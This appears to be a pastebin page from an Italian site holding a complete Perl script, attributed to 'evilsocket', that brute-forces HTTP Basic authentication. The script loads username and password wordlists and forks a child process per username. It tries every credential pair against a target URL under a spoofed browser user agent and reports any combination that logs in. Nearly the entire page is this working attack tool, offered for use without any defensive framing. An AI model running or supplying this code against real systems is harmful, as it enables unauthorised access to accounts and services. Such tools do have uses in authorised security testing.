KinG-InFeT.NeT ~ No-Paste

Titolo: HTTP Authentication Bruteforcer Autore: evilsocket Data: 20.09.09 Numero Linee:    
  1. #!/usr/bin/perl
  2.  
  3. #################################################################
  4.  
  5. # HTTP Authentication Bruteforcer
  6.  
  7. #
  8.  
  9. # Coded by: evilsocket --- http://www.evilsocket.net
  10.  
  11. #
  12.  
  13. #################################################################
  14.  
  15.  
  16. use LWP::UserAgent;
  17. use Getopt::Std;
  18.  
  19. my %options    = ();
  20. my $users_file = undef;
  21. my $passw_file = undef;
  22. my @usernames  = ();
  23. my @passwords  = ();
  24. my $url		   = undef;
  25. my $main_pid   = pid;
  26.  
  27. banner();
  28.  
  29. getopts("u:p:h:",\%options);
  30.  
  31. if( !defined($options{u}) or !defined($options{p}) or !defined($options{h}) ){
  32. 	usage();
  33. 	exit 1;
  34. }
  35. else{
  36. 	$users_file = $options{u};
  37. 	$passw_file = $options{p};
  38. 	$url        = $options{h};
  39. }
  40.  
  41. load_entries();
  42.  
  43. print( "@ PRESS RETURN TO START BRUTEFORCING ...\n" );
  44.  
  45. my $dummy = <STDIN>;
  46.  
  47. print( "@ Starting bruteforcing against '$url' ...\n\n" );
  48.  
  49. foreach my $username ( @usernames ){
  50. 	my $pid = fork();
  51.  
  52. 	if( not defined($pid) ){
  53. 		die( "@ ERROR : Could not fork child process !\n" );
  54. 	} 
  55. 	elsif($pid == 0) {
  56. 		foreach my $password ( @passwords ){
  57. 			print "@ Trying '$username : $password' ...\n";
  58. 			if( http_authenticate( $url, $username, $password ) ){
  59. 				print( "\n@ SUCCESSFULLY AUTHENTICATED WITH '$username - $password' !!!!\n" );
  60. 				kill( 1, $main_pid );
  61. 			}
  62. 		}
  63. 	} 
  64. }
  65.  
  66. sub banner{
  67. 	print( "\n*********************************************\n" );
  68. 	print( "*      HTTP Authentication Bruteforcer      *\n" );
  69. 	print( "* by evilsocket (http://www.evilsocket.net) *\n" );
  70. 	print( "*********************************************\n\n" );
  71. }
  72.  
  73. sub usage{
  74. 	print( "Usage : httpbrute.pl -u <users_file> -p <passwords_file> -h <HOST>\n\n" );
  75. 	print( "\t<users_file>     : File where to read usernames from .\n" );
  76. 	print( "\t<passwords_file> : File where to read passwords from .\n" );
  77. 	print( "\t<HOST>		   : Complete url to bruteforce .\n\n" );
  78. 	print( "Example :\n\n" );
  79. 	print( "\thttpbrute.pl -u usernames.txt -p passwords.txt -h http://192.168.1.1/\n" );
  80. }
  81.  
  82. # load usernames and passwords
  83.  
  84. sub load_entries{
  85. 	my $line = undef;
  86. 	# load users
  87.  
  88. 	open( FILE,"<$users_file") or die( "@ ERROR : Could not open $users_file : $!\n" );
  89. 	while( $line = <FILE>){
  90. 		chomp($line);
  91. 		if( !($line =~ /^\#/) and length($line) ){ 
  92.  
  93. 			push( @usernames, $line );
  94. 		}
  95. 	}
  96. 	close(FILE);
  97. 	$line = undef;
  98. 	# load passwords
  99.  
  100. 	open( FILE,"<$passw_file") or die( "ERROR : Could not open $passw_file : $!\n" );
  101. 	while( $line = <FILE>){
  102. 		chomp($line);
  103. 		if( !($line =~ /^\#/) and length($line) ){ 
  104.  
  105. 			push( @passwords, $line );
  106. 		}
  107. 	}
  108. 	close(FILE);
  109.  
  110. 	print( "@ Loaded ".@usernames." usernames and ".@passwords." passwords .\n" );
  111. }
  112.  
  113. # attempt http basic authentication against $url
  114.  
  115. sub http_authenticate{
  116. 	my ( $url, $username, $password ) = @_;
  117. 	my $request = new HTTP::Request GET => $url;
  118. 	my $ua      = new LWP::UserAgent;
  119.  
  120. 	$ua->agent("Mozilla/4.5 [en] (Win95; U)");
  121.  	$request->authorization_basic($username,$password);
  122.  
  123. 	my $response = $ua->request($request);
  124.  
  125. 	return $response->is_success;
  126. }
  127.  
  128.  


Powered By 0xPaste
Versione: v1.6



[-Administration Panel-]